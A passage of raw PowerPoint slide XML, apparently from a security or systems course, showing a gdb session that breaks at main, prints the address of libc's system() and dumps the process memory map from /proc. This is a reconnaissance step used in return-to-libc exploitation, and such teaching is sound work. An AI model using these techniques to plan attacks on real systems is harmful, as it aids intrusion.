          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>327</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6981246" y="4357316"/>
            <a:ext cx="341906" cy="198782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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404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1"/>
            <a:ext cx="8229600" cy="4609768"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) b main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) r foo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) p/x &amp;system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$2 = 0xb7e66310</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) info inferior  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Num</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  Description       Executable* 1    process 14077     /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) !</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/14077/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>maps</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08048000-08049000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r-xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 fd:01 134876     /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</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08049000-0804a000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 fd:01 134876     /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</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0804a000-0804b000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rw-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00001000 fd:01 134876     /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</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b7e25000-b7e26000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rw-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 00:00 0</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b7e26000-b7fce000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r-xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 fd:01 12884      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/i386-linux-gnu/libc-2.19.so</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b7fce000-b7fcf000 ---</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 001a8000 fd:01 12884      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/i386-linux-gnu/libc-2.19.so</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b7fcf000-b7fd1000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 001a8000 fd:01 12884      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/i386-linux-gnu/libc-2.19.so</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b7fd1000-b7fd2000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rw-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 001aa000 fd:01 12884      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/i386-linux-gnu/libc-2.19.so</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b7fd2000-b7fd5000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rw-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 00:00 0</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b7fdb000-b7fdd000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rw-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 00:00 0</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b7fdd000-b7fde000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r-xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 00:00 0          [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vdso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]</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b7fde000-b7ffe000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r-xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 fd:01 12681      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/i386-linux-gnu/ld-2.19.so</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b7ffe000-b7fff000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0001f000 fd:01 12681      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/i386-linux-gnu/ld-2.19.so</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b7fff000-b8000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rw-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00020000 fd:01 12681      /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/i386-linux-gnu/ld-2.19.so</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bffdf000-c0000000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rw-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00000000 00:00 0          [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
